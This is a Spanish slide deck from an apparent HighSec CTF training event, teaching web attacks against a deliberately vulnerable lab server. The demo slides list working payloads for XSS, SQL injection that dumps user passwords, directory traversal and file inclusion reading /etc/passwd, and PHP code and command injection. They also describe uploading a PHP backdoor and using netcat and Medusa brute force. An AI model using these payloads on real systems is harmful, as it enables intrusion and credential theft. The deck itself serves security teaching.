PDF de programación - CTF – 1 (Pruebas)

CON

HighSec

Quienes somos

• Eduardo Arriols (@_Hykeos)
• Roberto Lopez (@leurian)

Estudiantes de Ing. Informática en la EPS de la

UAM y apasionados del mundo de la
seguridad informática y el hacking.


Fundadores del proyecto HighSec.



Eduardo Arriols y Roberto Lopez

HighSec

Que es HighSec

• Es una comunidad y punto de reunión para
todas las personas interesadas en el mundo
de la seguridad.


• Su principal función es enseñar de forma

practica las principales técnicas en seguridad
ofensiva realizadas en un test de intrusión y
auditorias mediante retos y documentación
propia.


Eduardo Arriols y Roberto Lopez

HighSec

Que es HighSecCON

• Evento con dos partes:

– Resolución de retos
– Ponencias por gente del mundo de la seguridad



• Abierto a recibir propuestas para participar

como ponente.



Eduardo Arriols y Roberto Lopez

HighSec

CTF – 1 (Explicación)

• Escenario: Tenemos un servidor que aloja una

aplicación web que sabemos es vulnerable a
una gran cantidad de ataques.


• Objetivo: Descubrir y explotar todas las

posibles vulnerabilidades entre las que se
encuentran XSS, SQLi, Directory Traversal, LFI,
Code Injection, Command Injection, etc…

Eduardo Arriols y Roberto Lopez

HighSec

CTF – 1 (Pruebas)

• XSS
• SQL Injection
• Directory Traversal
• File Include
• Code Injection
• Commands Injection
• File Upload
• LDAP attacks
• XML attacks



Eduardo Arriols y Roberto Lopez

HighSec

XSS (Teoría)

• Inyectar código javascript en una aplicación
web, con el fin de que sea ejecutado por el
usuario final. Hay dos tipos: persistente y
reflejado.
• Peligros:

– Robo de cookies (Sesión)
– Ejecución de js (Botnet JS, MiTB, Keylogger)
– Defacement
– BlackSeo

Eduardo Arriols y Roberto Lopez

HighSec

XSS (DEMO)

• Ejercicio 1: <script>alert(123)</script>
• Ejercicio 2: <SCRIPT>alert(123)</SCRIPT>
• Ejercicio 3: <iframe



src="javascript:alert(123)"></iframe>



• Ejercicio 4: <a onmouseover="alert(123)"> XSS</a>
• Ejercicio 5: <a onmouseover="prompt(123)"> XSS</a>
• Ejercicio 6: </script><script>alert(123)</script>
• Ejercicio 7: ';alert(123);var+$a='hacker
• Ejercicio 9: #hacker<script>alert(123)</script>



Eduardo Arriols y Roberto Lopez

HighSec

SQL Injection (Teoría)

• Inyección de código SQL en las consultas que
realiza la aplicación web a la BBDD con el fin
de obtener o modificar datos distintos a los
esperados.

• Peligros:

– Volcar la BBDD
– Lectura y escritura de ficheros
– Obtener control del servidor (Mala conf.)

Eduardo Arriols y Roberto Lopez

HighSec

SQL Injection (DEMO)

• Ejercicio 1:



'1'='1

' and 1=0 union select id,name,passwd,4,5 from users where

• Ejercicio 2: ‘/**/and/**/1=0/**/union/**/select/**/id,name,



passwd,4,5/**/from/**/users/**/where/**/'1'='1



• Ejercicio 3: Igual que el 2
• Ejercicio 4:

• Ejercicio 5: Igual que el 4
• Ejercicio 6:



1=1

2 and 1=0 union select id,name,passwd,4,5 from users

2 and 1=0 union select id,name,passwd,4,5 from users where

Eduardo Arriols y Roberto Lopez

HighSec

Directory Traversal (Teoría)

• Capacidad de elevar directorios desde el

actual y obtener acceso a directorios y
ficheros que no se esperaban.

• Peligros:

– Acceso a información confidencial y ficheros de

configuración importantes (/etc/passwd y
/etc/shadow) con los que obtener acceso al
servidor.

Eduardo Arriols y Roberto Lopez

HighSec

Directory Traversal (DEMO)

• Obtenemos la url donde explotar la vulnerabilidad desde la

imagen….


/dirtrav/example1.php?file=../../../../../../../../etc/passwd

• Ejercicio 1:


• Ejercicio 2:








/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

• Ejercicio 3:




dirtrav/example3.php?file=../../../../../../../etc/passwd%00

Eduardo Arriols y Roberto Lopez

HighSec

File Include (Teoría)

• Ejecución de ficheros diferentes a los

esperados, debido a una falta de filtrado en
las funciones de inclusión de archivos.

• Peligros:

– Ejecucion y acceso a ficheros privados (como

archivos de conf)

– Control del servidor subiendo una shell en php

desde los logs

Eduardo Arriols y Roberto Lopez

HighSec

File Include (DEMO)

• Ejercicio 1:


/fileincl/example1.php?page=/etc/passwd


• Ejercicio 2:
/fileincl/example2.php?page=/etc/passwd%00

Eduardo Arriols y Roberto Lopez

HighSec

Code Injection (Teoría)

• Inyección de código fuente que permite

interactuar de forma directa con el servidor
debido a una falta de filtrado en las entradas
de funciones como eval() al utilizar los datos
del usuario como argumentos.

• Peligros:

– Acceso completo al servidor con la posibilidad de

ejecutar comandos en el.

Eduardo Arriols y Roberto Lopez

HighSec

Code Injection (DEMO)

".system('uname+-a')."

id);}system('uname+-a');//







• Ejercicio 1:

• Ejercicio 2:

• Ejercicio 3:




'.system('uname+-a').'

Eduardo Arriols y Roberto Lopez

HighSec

Command Injection (Teoría)

• Inyección de comandos de forma directa en el

sistema operativo desde la aplicación web.


• Peligros:

– Acceso completo al servidor.

Eduardo Arriols y Roberto Lopez

HighSec

Command Injection (DEMO)

127.0.0.1;echo+"\n\nUname:";uname+-a

127.0.0.1%0Aecho+"\n\nUname:";uname+-a

• Ejercicio 1:


• Ejercicio 2:


• Ejercicio 3:

nc IP 80
GET

/commandexec/example3.php?ip=127.0.0.1|únam
e+-a HTTP/1.0










Eduardo Arriols y Roberto Lopez

HighSec

File Upload (Teoría)

• La aplicación permite subir ficheros que no

deberían estar permitidos como ficheros que
permitan ejecutar comandos o tomar control
del servidor.


• Peligros:

– Subir ficheros como .php que permitan

interactuar con el servidor y tomar control de el.

Eduardo Arriols y Roberto Lopez

HighSec

File Upload (DEMO)

• Ejercicio 1: Subimos un archivo .php con una

backdoor muy simple utilizando la función
system.


• Ejercicio 2: Subimos el mismo archivo pero lo

renombramos como .php3

Eduardo Arriols y Roberto Lopez

HighSec

CTF – 2 (Explicación)

• Escenario: Un servidor en Internet listo para

ser auditado.


• Objetivo: Lograr entrar en el servidor y elevar

privilegios tomando el control del sistema.

Eduardo Arriols y Roberto Lopez

HighSec

Fases del Pentest

Eduardo Arriols y Roberto Lopez

HighSec

CTF – 2 (Pruebas)

• Nmap -> Versiones de los servicios
• Nessus -> Análisis automatizado de

vulnerabilidades

• NetCat -> Conexión a Backdoor (1337/tcp)
• Finger -> Enumeración de usuarios
• FTP (anonymous)
• Medusa -> Fuerza Bruta (2222/tcp -> ssh o

901/tcp)


Eduardo Arriols y Roberto Lopez

HighSec
FIN

• Si tenéis cualquier duda ponerla en el foro
(http://foro.highsec.es) o hacérnosla llegar
por correo a [email protected].


• El próximo reto estará disponible a partir del

día 16/09/2014

Eduardo Arriols y Roberto Lopez

HighSec

@highsec0
[email protected]

Eduardo Arriols (@_Hykeos) – [email protected]

Roberto Lopez (@leurian) – [email protected]

Eduardo Arriols y Roberto Lopez